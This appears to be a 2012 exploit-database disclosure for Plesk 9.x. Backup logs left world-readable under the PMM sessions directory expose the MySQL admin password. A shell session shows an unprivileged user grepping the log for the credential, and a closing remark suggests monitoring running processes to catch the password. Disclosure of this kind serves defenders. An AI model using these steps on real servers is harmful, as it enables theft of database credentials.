38 lines
No EOL
1.6 KiB
Text
38 lines
No EOL
1.6 KiB
Text
# Exploit Title: PLESK 9.x insecure directory permission ( admin password
|
|
revealed )
|
|
# Date: 25/04/2012
|
|
# Author: Nicolas Krassas , twitter.com/dinosn
|
|
# Software Link: www.*parallels*.com/*plesk*/
|
|
# Version: 9.x
|
|
# Tested on: ubuntu / centos
|
|
|
|
During backup procedures, PLESK panel is keeping a detailed log of the
|
|
process under /opt/psa/PMM/sessions in Debian/Ubuntu installations and
|
|
/usr/local/psa/PMM/sessions in Centos under the directory with the current
|
|
date. A detailed log file is created with the name psadump.log, with
|
|
readable permissions for everyone. The file will reveal the admin password
|
|
used from the backup process to dump the mysql databases from the sites
|
|
being backed up.
|
|
|
|
It's possible to locate data also under the sessions directory from
|
|
incomplete/crashed backup sessions where the log files are not safely
|
|
removed from the system.
|
|
|
|
e.g.:
|
|
|
|
$ id
|
|
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
$ cd /opt/psa/PMM/sessions
|
|
$ ls -Fal
|
|
total 32
|
|
drwxr-xr-x 8 root root 4096 2012-04-25 21:42 ./
|
|
drwxr-xr-x 10 root root 4096 2009-12-03 22:07 ../
|
|
drwxr-xr-x 3 root root 4096 2012-04-25 22:12 2012-04-25-211250.973/
|
|
$ cat 2012-04-25-211250.973/psadump.log | grep admin
|
|
18:52:26 INFO Executing bundle producer: '/usr/bin/mysqldump -h
|
|
'localhost' -u 'admin' -p' PASSOWORD ' -P '3306' --quick --quote-names
|
|
--add-drop-table --default-character-set=utf8 --set-charset 'DB'' in
|
|
|
|
Old but I didn't see it listed, another way is to constantly monitor the
|
|
system for the mysqldump process using a simple bash script to get the
|
|
credentials as the process is running in the scheduled plesk backups. |